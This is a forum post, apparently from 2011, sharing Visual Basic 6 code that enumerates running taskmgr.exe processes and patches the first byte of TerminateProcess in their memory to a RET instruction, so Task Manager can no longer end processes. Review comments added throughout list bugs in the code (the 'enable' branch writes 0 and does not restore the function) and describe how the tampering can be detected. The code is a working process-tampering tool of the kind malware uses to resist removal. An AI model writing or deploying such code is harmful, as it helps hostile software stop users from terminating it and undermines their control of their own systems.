10-17-2011، 01:30 AM
Enable/Disable Task Manager with WriteProcessMemory
کد:
' kernel32 API declarations used by DisableTaskManager: Toolhelp process
' enumeration, OpenProcess, and WriteProcessMemory for a cross-process write.
' NOTE(review): lProcessID is declared without ByVal, so VB passes a pointer,
' whereas the Win32 prototype takes the process ID by value. The only call in
' this file uses TH32CS_SNAPPROCESS, for which the process ID is not used.
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, lProcessID As Long) As Long
' Snapshot flag: include all processes in the snapshot.
Const TH32CS_SNAPPROCESS As Long = &H2
' Full-access process rights mask (the pre-Vista PROCESS_ALL_ACCESS value).
' Defender note: this is the access mask that process-access telemetry
' (for example Sysmon Event ID 10, GrantedAccess) would show against taskmgr.exe.
Const PROCESS_ALL_ACCESS = &H1F0FFF
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
' lpBaseAddress and lpBuffer are "As Any": the caller decides ByVal/ByRef at the call site.
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
' VB6 mirror of the Win32 PROCESSENTRY32 record that Process32First and
' Process32Next fill in for each process in a Toolhelp snapshot.
' NOTE(review): cntUseage and swFlags correspond to cntUsage and dwFlags in the
' Win32 definition; only the spelling differs, the field order is the same.
Public Type PROCESSENTRY32
dwSize As Long ' structure size; the caller sets it (Len(pe32)) before enumerating
cntUseage As Long
th32ProcessID As Long ' process ID, later passed to OpenProcess
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
swFlags As Long
' NOTE(review): the Win32 structure defines szExeFile as MAX_PATH (260) characters;
' this declaration reserves 1024, so dwSize is larger than the native size.
szExeFile As String * 1024 ' executable file name, matched against "TASKMGR.EXE"
End Type
' Overwrites the first byte of kernel32's TerminateProcess inside each running
' taskmgr.exe process found in a Toolhelp snapshot.
'   Disable = True  -> writes the byte 195 (&HC3, the x86 RET opcode), so
'                      Task Manager's own calls to TerminateProcess return at once.
'   Disable = False -> writes the byte 0.
' Returns True if at least one WriteProcessMemory call reported success.
' Task Manager itself keeps running; only its ability to end processes is affected.
'
' Security context: this is in-memory tampering with an administration tool.
' Nothing is written to disk or the registry here, so the change lasts only for
' the lifetime of the patched taskmgr.exe; a newly started instance is not patched.
' Detection: an unrelated process opening taskmgr.exe with the &H1F0FFF access
' mask and then writing into it. Process-access telemetry such as Sysmon
' Event ID 10 records source image, target image and GrantedAccess.
'
' NOTE(review): defects in the code as posted (left unchanged here):
'  - The "enable" branch writes 0 instead of the original first byte, so it does
'    not restore TerminateProcess; restarting Task Manager is the reliable undo.
'  - CloseHandle is called on hWrite (a success flag) and on hAddress (a function
'    address). Neither is a handle.
'  - The Process32First result is discarded and the loop begins with
'    Process32Next, so the first snapshot entry is never examined; the snapshot
'    handle is not checked for failure.
'  - The address is resolved in the calling process and assumed to be the same in
'    the target. Presumably this only holds when both processes have the same
'    bitness and module base; TODO confirm.
Public Function DisableTaskManager(Disable As Boolean) As Boolean
Dim hSnapShot As Long, hAddress As Long, hProcess As Long, hWrite As Long
Dim pe32 As PROCESSENTRY32
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) 'snapshot of all running processes
pe32.dwSize = Len(pe32) 'Toolhelp requires dwSize to be set before the first call
Process32First hSnapShot, pe32 'fetch the first entry (return value ignored)
Do While Process32Next(hSnapShot, pe32) <> 0 'walk the remaining entries; does not stop at the first match
If InStr(1, LCase(pe32.szExeFile), LCase("TASKMGR.EXE")) > 0 Then 'case-insensitive substring match on the image name
hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, pe32.th32ProcessID) 'full-access handle to the target
If hProcess <> 0 Then
hAddress = GetProcAddress(GetModuleHandle("KERNEL32.DLL"), "TerminateProcess") 'address of TerminateProcess in THIS process
If hAddress <> 0 Then
If Disable = True Then
hWrite = WriteProcessMemory(hProcess, ByVal hAddress, 195, 1, 0) 'write one byte, 195 (&HC3), at the function entry
Else
hWrite = WriteProcessMemory(hProcess, ByVal hAddress, 0, 1, 0) 'write one byte, 0 - NOT the original byte
End If
If hWrite <> 0 Then
DisableTaskManager = True
End If
Call CloseHandle(hWrite) 'NOTE(review): hWrite is a success flag, not a handle
End If
Call CloseHandle(hAddress) 'NOTE(review): hAddress is a function address, not a handle
End If
Call CloseHandle(hProcess) 'release the process handle (also reached when OpenProcess returned 0)
End If
Loop
Call CloseHandle(hSnapShot) 'release the snapshot handle
End Function
' Program entry point: always requests the "disable" patch and reports the
' outcome in a message box. The success text is the same for either direction.
Sub Main()
    Dim patched As Boolean
    patched = DisableTaskManager(True)
    If Not patched Then
        MsgBox "Could Not enable/disable Task Manager"
    Else
        MsgBox "Enabled/disabled Task Manager"
    End If
End Sub